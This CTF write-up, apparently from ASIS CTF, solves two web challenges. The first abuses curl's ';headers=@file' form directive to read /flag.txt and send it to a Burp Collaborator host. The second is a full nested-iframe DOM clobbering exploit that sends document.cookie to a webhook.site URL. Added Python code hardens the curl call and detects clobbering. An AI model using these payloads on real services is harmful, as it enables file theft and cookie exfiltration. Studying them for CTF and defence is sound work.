I only managed to solve two on my own; still pretty weak.

RaaS-v1

A read-the-docs challenge.

The challenge provides the source code.

The final command is assembled here:

foreach($formParams as $key => $value){
	if(preg_match("/^\w+$/",$key)){                 // key must be [A-Za-z0-9_]+ only
		$cmd .= '-F ';
		$cmd .= escapeshellarg($key.'= '.$value);  // one shell-safe argument, but note the space after '='
	}
}

There is an extra space after the "=", so uploading a file through the -F parameter fails.

After concatenation the command looks like this:

curl --proto -file "http://127.0.0.1" -X "GET" -F "file= @/flag.txt"

Because of the extra space the value no longer starts with "@", so curl sends the literal string " @/flag.txt" instead of the file contents.

Reading the official curl documentation directly turns up this:

https://curl.se/docs/manpage.html#-F

You can add custom headers to the field by setting headers=, like

curl -F "submit=OK;headers=\"X-submit-type: OK\"" example.com

or

curl -F "submit=OK;headers=@headerfile" example.com

So headers=@file can be used: the ;headers= directive is parsed from inside the value, so the leading space does not get in its way.

Payload:

http://raas-v1.asisctf.com:9000/?url=https://3sw5lub27zg8aeffl8bc7hupegk98y.burpcollaborator.net&method=POST&formParams[file]=submit=OK;headers=@/flag.txt
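An added example (Python rather than the challenge's PHP, and not the challenge's code): the command builder from the source re-created next to a hardened version that uses curl's --form-string, plus a check that flags values curl -F would read from a local file. The function names are mine.

```python
import re
import shlex

# escapeshellarg() in the original stops shell injection, but curl's -F still
# parses the value itself: a leading '@' or '<' reads a local file, and a
# ';headers=@file' directive reads one too, which is what the writeup's payload uses.

KEY_RE = re.compile(r"^\w+$")
# Value shapes that make curl -F read a local file (used for alerting).
FILE_READ_RE = re.compile(r"^\s*[@<]|;\s*headers\s*=\s*@")


def reads_local_file(value: str) -> bool:
    """True if curl -F would treat this form value as a file reference."""
    return FILE_READ_RE.search(value) is not None


def build_argv_original(url: str, method: str, form_params: dict) -> list:
    """Mirror of the page's loop: -F plus the accidental space after '='."""
    argv = ["curl", "--proto", "-file", url, "-X", method]
    for key, value in form_params.items():
        if KEY_RE.match(key):
            argv += ["-F", f"{key}= {value}"]   # "file= @/flag.txt" is sent as text
    return argv


def build_argv_hardened(url: str, method: str, form_params: dict):
    """Same shape, but --form-string sends the value literally: '@', '<' and the
    ';'-directives such as headers= lose their meaning, so no local file is read.
    Returns the argv plus the keys whose values would have triggered a read under -F."""
    argv = ["curl", "--proto", "-file", url, "-X", method]
    alerts = []
    for key, value in form_params.items():
        if not KEY_RE.match(key):
            continue
        if reads_local_file(value):
            alerts.append(key)              # log/alert on this in a real service
        argv += ["--form-string", f"{key}={value}"]
    return argv, alerts


def render(argv: list) -> str:
    """Shell-quoted form, the equivalent of PHP's escapeshellarg per argument."""
    return shlex.join(argv)


if __name__ == "__main__":
    params = {"file": "submit=OK;headers=@/flag.txt"}
    print(render(build_argv_original("http://127.0.0.1", "POST", params)))
    argv, alerts = build_argv_hardened("http://127.0.0.1", "POST", params)
    print(render(argv), "alerts:", alerts)
```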

h.n.y

Source code is provided.

index.html looks like this:

<html>
	<head>
		<title>hi</title>
	</head>
	<body>
		<h1>definitely not vulnerable to XSS</h1>
		<div>
			MSG
		</div>
		<script nonce="$nonce$">
			try{
				eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString())
			}catch(e){}
		</script>
	</body>
</html>

This obviously calls for DOM clobbering.

Related article for background: https://blog.csdn.net/qq_38154820/article/details/106330275?utm_source=app&app_version=5.0.1&code=app_1562916241&uLinkId=usr1mkqgl919blen

A tool worth recommending here:

https://github.com/splitline/DOM-Clobber3r

The payload can be generated directly with this tool.


(Because the challenge enforces a CSP, the flag is exfiltrated through a redirect instead: javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie)

Make sure to strip the extra quotes on both ends, since the redirect link itself contains quotes; otherwise it will not parse correctly.


One last thing to watch out for: eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString()) may run before the DOM has finished loading, so a few synchronously loaded link tags, <link rel="stylesheet" href="style.css">, have to be appended at the end (a stylesheet that is still loading blocks the script that follows it, which gives the nested iframes time to load).

exp:

<iframe name=h srcdoc="<iframe name=a srcdoc=&quot;<iframe name=p srcdoc=&amp;quot;<iframe name=p srcdoc=&amp;amp;quot;<iframe name=y srcdoc=&amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;quot;<iframe name=n srcdoc=&amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;quot;<iframe name=w srcdoc=&amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=y srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=h srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=c srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=k srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<a id='s' 
href=javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie></a>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;quot;></iframe>&amp;amp;quot;></iframe>&amp;quot;></iframe>&quot;></iframe>"></iframe><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css">

URL-encode it and send it (the challenge limits the payload length, so the extra line breaks also have to be removed).

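An added check written for this writeup (Python, not from the challenge or its author): given the HTML that lands in the MSG slot, it lists which window property chains the fragment would clobber, so a page like index.html can be tested before it ships. The names and the three-level SAMPLE are constructed here.

```python
from html.parser import HTMLParser

# Browsers expose an element's id on window, and the name of embed/form/iframe/
# img/object elements as well; an <iframe name=X srcdoc="..."> makes window.X
# the nested window, whose own named elements continue the chain. Each srcdoc
# is re-parsed recursively, which is how the &quot;/&amp;quot; layers unfold.

NAME_EXPOSED = {"embed", "form", "iframe", "img", "object"}
# The chain the challenge page eval()s; the writeup's payload clobbers it.
TARGET_CHAIN = "h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s"


class _NamedCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = {}   # dotted chain -> tag of the element at its end

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)   # HTMLParser has already unescaped the values
        names = []
        if a.get("id"):
            names.append(a["id"])
        if tag in NAME_EXPOSED and a.get("name"):
            names.append(a["name"])
        for n in names:
            self.found[n] = tag
            if tag == "iframe" and a.get("srcdoc"):
                for sub, subtag in clobbered_chains(a["srcdoc"]).items():
                    self.found[f"{n}.{sub}"] = subtag


def clobbered_chains(fragment: str) -> dict:
    """Map every window property chain the fragment creates to its leaf tag."""
    p = _NamedCollector()
    p.feed(fragment)
    p.close()
    return p.found


def can_clobber(fragment: str, chain: str = TARGET_CHAIN) -> bool:
    """True if rendering the fragment makes `chain` resolve to an element."""
    return chain in clobbered_chains(fragment)


# Constructed three-level sample in the writeup's nesting style.
SAMPLE = ('<iframe name=h srcdoc="<iframe name=a srcdoc=&quot;'
          '<a id=s href=x></a>&quot;></iframe>"></iframe>')

if __name__ == "__main__":
    print(clobbered_chains(SAMPLE))   # {'h': 'iframe', 'h.a': 'iframe', 'h.a.s': 'a'}
    print(can_clobber(SAMPLE, "h.a.s"), can_clobber(SAMPLE))
```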
